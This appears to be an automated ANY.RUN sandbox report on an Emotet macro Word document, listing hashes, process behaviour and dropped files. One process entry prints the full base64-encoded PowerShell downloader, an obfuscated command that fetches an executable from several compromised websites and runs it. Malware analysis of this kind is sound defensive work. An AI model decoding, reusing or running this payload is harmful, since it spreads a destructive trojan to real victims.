File name:

q0h1u1i84

Full analysis: https://app.any.run/tasks/cbd2e95e-c935-46e1-8fac-236f2aba74e1
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: August 08, 2020, 09:52:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Odio., Author: Marie Guillot, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Aug 7 22:57:00 2020, Last Saved Time/Date: Fri Aug 7 22:57:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0
MD5:

1AAE29C4728ACC0BAB6D5A49CCC625CB

SHA1:

B7380461EC30092F123532D85E37A60FBE2E3C48

SHA256:

8BB0E69180AAD1D96C179FB624FA5B9D2455C62A298CB3C1F9CDB059C8049478

SSDEEP:

3072:S4PrXcuQuvpzm4bkiaMQgAlSs5RA+ZwM3RQ:TDRv1m4bnQgISsrAYwM3RQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • mmc.exe (PID: 2968)
      • CCleaner.exe (PID: 3852)
      • CCleaner.exe (PID: 3436)

    • Loads the Task Scheduler DLL interface

      • CCleaner.exe (PID: 3436)

    • Actions looks like stealing of personal data

      • CCleaner.exe (PID: 3436)

  • SUSPICIOUS

    • PowerShell script executed

      • powersheLL.exe (PID: 472)

    • Executed via WMI

      • powersheLL.exe (PID: 472)

    • Creates files in the user directory

      • powersheLL.exe (PID: 472)
      • CCleaner.exe (PID: 3436)

    • Reads internet explorer settings

      • CCleaner.exe (PID: 3436)

    • Executed via Task Scheduler

      • CCleaner.exe (PID: 3436)

    • Low-level read access rights to disk partition

      • CCleaner.exe (PID: 3436)

    • Reads Internet Cache Settings

      • CCleaner.exe (PID: 3436)

    • Searches for installed software

      • CCleaner.exe (PID: 3436)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1672)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1672)

    • Manual execution by user

      • mmc.exe (PID: 3972)
      • mmc.exe (PID: 2968)
      • taskmgr.exe (PID: 2340)
      • CCleaner.exe (PID: 3852)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Odio.
Subject: -
Author: Marie Guillot
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:08:07 21:57:00
ModifyDate: 2020:08:07 21:57:00
Pages: 1
Words: 4
Characters: 24
Security: None
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 27
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs mmc.exe no specs mmc.exe taskmgr.exe no specs ccleaner.exe no specs ccleaner.exe

Process information

PID
CMD
Path
Indicators
Parent process
472powersheLL -e JABLAEUAQwBOAEMAbgBtAGMAPQAnAEIAWABKAE0ASgBnAGgAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQBUAHkAcABgAFIAYABvAHQAbwBgAGMAbwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAVgBPAFoATABNAG8AcAB3ACAAPQAgACcANQA0ADMAJwA7ACQATwBVAEwASwBBAGcAZABvAD0AJwBOAEkAQwBJAEEAZgBjAGUAJwA7ACQASQBBAE0AUABMAGIAYQBsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAE8AWgBMAE0AbwBwAHcAKwAnAC4AZQB4AGUAJwA7ACQAVgBYAFoAQwBKAGYAeQBvAD0AJwBJAEUAVABEAEsAegBoAGgAJwA7ACQAVgBHAFMAVwBQAGkAawBvAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAHcARQBCAEMATABpAEUAbgB0ADsAJABFAEcATgBMAE0AZgB5AGMAPQAnAGgAdAB0AHAAOgAvAC8AZQBsAGQAaQBvAHMAcwB0AG8AcgBlAC4AYwBvAG0ALwBjAHMAcwAvAHEAcABmAHYAXwBlAF8AeQAzAGwAawAwAHMAcAA2AGkALwAqAGgAdAB0AHAAOgAvAC8AbAB1AGMAawB5AG0AZQAyADQANwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcQBhAHcAcAB3AF8AdgAxAF8AZwBoAGUAMQB3AG0AegB4AHoAYwAvACoAaAB0AHQAcAA6AC8ALwB2AGEAbgBkAGEAbQBlAGIAdQBpAGwAZABlAHIAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQAyAGsAeQBfADEAOABqADgAXwB3AG4ANAB2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGUAcgB2AGkAbgBnAHYAZQB0AGUAcgBhAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgB5AF8ANABiAHEAZQBfAHoAdQA2AGUAdwAvACoAaAB0AHQAcAA6AC8ALwBjAHMAbQBiAHUAaQBsAGQAZQByAHMAbABsAGMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHQAZQBxAHYAbQBfAG4AMAB5AGEAaQBfADgANAAvACcALgAiAFMAYABwAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWQBUAEIARwBaAHoAdABvAD0AJwBaAFAASQBHAEcAYgBpAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAVQBRAFgAVwBmAG0AaQAgAGkAbgAgACQARQBHAE4ATABNAGYAeQBjACkAewB0AHIAeQB7ACQAVgBHAFMAVwBQAGkAawBvAC4AIgBkAE8AdwBuAEwAYABPAGAAQQBkAGYAaQBgAEwARQAiACgAJABZAFUAUQBYAFcAZgBtAGkALAAgACQASQBBAE0AUABMAGIAYQBsACkAOwAkAEkATABMAEcATABtAHEAdQA9ACcAWgBKAFkAQwBCAHQAYQBlACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQASQBBAE0AUABMAGIAYQBsACkALgAiAGwAZQBOAGAARwBgAFQASAAiACAALQBnAGUAIAAyADgANwA2ADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAQQBgAFQARQAiACgAJABJAEEATQBQAEwAYgBhAGwAKQA7ACQATwBZAEEASgBVAHIAegB5AD0AJwBCAFgAUwBVAEQAagB5AHYAJwA7AGIAcgBlAGEAawA7ACQAUwBIAE8AUABGAHAAdABmAD0AJwBYAE8AUABHAEMAcQBsAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBDAFIATwBNAG8AagBzAD0AJwBIAE8AVQBTAEQAeABoAG0AJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1672"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\q0h1u1i84.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2340"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2968"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /sC:\Windows\system32\mmc.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Management Console
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mfc42u.dll
3436"C:\Program Files\CCleaner\CCleaner.exe" /uacC:\Program Files\CCleaner\CCleaner.exe
taskeng.exe
User:
admin
Company:
Piriform Ltd
Integrity Level:
HIGH
Description:
CCleaner
Exit code:
0
Version:
5, 35, 0, 6210
Modules
Images
c:\program files\ccleaner\ccleaner.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
3852"C:\Program Files\CCleaner\CCleaner.exe" C:\Program Files\CCleaner\CCleaner.exeexplorer.exe
User:
admin
Company:
Piriform Ltd
Integrity Level:
MEDIUM
Description:
CCleaner
Exit code:
0
Version:
5, 35, 0, 6210
Modules
Images
c:\program files\ccleaner\ccleaner.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
3972"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /sC:\Windows\system32\mmc.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Management Console
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll
Total events
2 995
Read events
2 561
Write events
351
Delete events
83

Modification events

(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:q<
Value:
717F3C0088060000010000000000000000000000
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(1672) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
3
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7BD1.tmp.cvr
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF29B1BE0209D75C83.TMP
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFAF75186476751082.TMP
MD5:
SHA256:
472powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DFQH3G3XWV47Q86LVXLU.temp
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFDAED7E0DB73E0287.TMP
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFA572A26085408727.TMP
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF2424821664242E50.TMP
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF7739CDAF095FF4B5.TMP
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47360C42-CFAB-4E85-A859-CBD535055CFD}.tmp
MD5:
SHA256:
1672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF0FEDA5B546C46A30.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
Process
Message
mmc.exe
Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
q0h1u1i84